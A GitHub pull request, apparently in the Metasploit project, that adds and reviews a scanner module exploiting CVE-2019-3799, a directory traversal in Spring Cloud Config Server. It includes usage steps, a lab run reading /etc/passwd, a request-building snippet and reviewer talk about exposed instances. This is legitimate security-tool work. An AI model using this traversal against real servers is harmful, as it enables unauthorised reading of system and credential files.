Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

(CVE-2019-3799) Directory traversal - spring-cloud-config-server #11745

Merged
merged 9 commits into from Apr 26, 2019

Conversation

Projects
None yet
5 participants
@RootUp
Copy link
Contributor

commented Apr 18, 2019

        This module exploits an unauthenticated directory traversal vulnerability
        which exists in spring cloud config, versions 2.1.x prior to 2.1.2, 
        versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, which is
        listening by default on port 8888.

Verification

1. Start msfconsole
2. use auxiliary/scanner/http/springcloud_traversal
3. set RHOSTS
4. run

Reference:
https://pivotal.io/security/cve-2019-3799
https://twitter.com/chybeta/status/1118370858974760963

bcoles and others added some commits Apr 18, 2019

Update modules/auxiliary/scanner/http/springcloud_traversal.rb
Co-Authored-By: RootUp <mishra.dhiraj95@gmail.com>
Update modules/auxiliary/scanner/http/springcloud_traversal.rb
Co-Authored-By: RootUp <mishra.dhiraj95@gmail.com>
@bcoles

This comment has been minimized.

Copy link
Contributor

commented Apr 18, 2019

@msjenkins-r7 test this please

@bcoles bcoles added docs and removed needs-docs labels Apr 18, 2019

@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Apr 18, 2019

Tested on Ubuntu 16.04 LTS with spring-cloud v2.1.1.

msf > use auxiliary/scanner/http/springcloud_traversal 
msf auxiliary(scanner/http/springcloud_traversal) > set RHOSTS 192.168.1.132
RHOSTS => 192.168.1.132
msf auxiliary(scanner/http/springcloud_traversal) > set VERBOSE true 
VERBOSE => true
msf auxiliary(scanner/http/springcloud_traversal) > run

[+] 192.168.1.132:8888 - root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
.....
[+] File saved in: /home/input0/.msf4/loot/20190418203824_default_192.168.1.132_springcloud.trav_350250.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/springcloud_traversal) > 
@jhart-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 18, 2019

FWIW, I checked the most recent Sonar HTTP study for 8888/TCP and identified ~3300 instances of Spring Cloud Config listening. This does not imply that they are vulnerable but may be useful context.


res = send_request_raw({
'method' => 'GET',
'uri' => "/foo/default/master/#{traversal}"

This comment has been minimized.

Copy link
@bcoles

bcoles Apr 18, 2019

Contributor

Is foo important? Can it be randomized?

This comment has been minimized.

Copy link
@jhart-r7

jhart-r7 Apr 18, 2019

Contributor

I don't believe either of the first two parts of the path matter. In my testing these can be anything.

This comment has been minimized.

Copy link
@RootUp

RootUp Apr 18, 2019

Author Contributor

I found it to be default after the installation.
https://github.com/spring-cloud/spring-cloud-config#QuickStart

This comment has been minimized.

Copy link
@jhart-r7

jhart-r7 Apr 18, 2019

Contributor

I tested with docker run -it -p 8888:8888 -e SPRING_CLOUD_CONFIG_SERVER_GIT_URI=https://github.com/spring-cloud-samples/config-repo hyness/spring-cloud-config-server:2.1.1.RELEASE. The second part is the profile which does default to default in my testing too but its value does not seem to matter. That could be a side effect of how I'm testing.

@bcoles

This comment has been minimized.

Copy link
Contributor

commented Apr 18, 2019

FWIW, I checked the most recent Sonar HTTP study for 8888/TCP and identified ~3300 instances of Spring Cloud Config listening. This does not imply that they are vulnerable but may be useful context.

For comparison:

These imply Spring, but may not imply Spring Cloud Config.

@jrobles-r7 jrobles-r7 self-assigned this Apr 24, 2019

RootUp and others added some commits Apr 24, 2019

Update modules/auxiliary/scanner/http/springcloud_traversal.rb
Co-Authored-By: RootUp <mishra.dhiraj95@gmail.com>
Update modules/auxiliary/scanner/http/springcloud_traversal.rb
Co-Authored-By: RootUp <mishra.dhiraj95@gmail.com>
@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Apr 24, 2019

Thank you @jrobles-r7 I've made the necessary changes.

jrobles-r7 added some commits Apr 26, 2019

@jrobles-r7 jrobles-r7 merged commit 306b0fd into rapid7:master Apr 26, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

jrobles-r7 added a commit that referenced this pull request Apr 26, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 26, 2019

Release Notes

The springcloud_traversal scanner module has been added to the framework. This module can be used to download files from Spring Cloud Config servers that are vulnerable to directory traversal.

msjenkins-r7 added a commit that referenced this pull request Apr 26, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.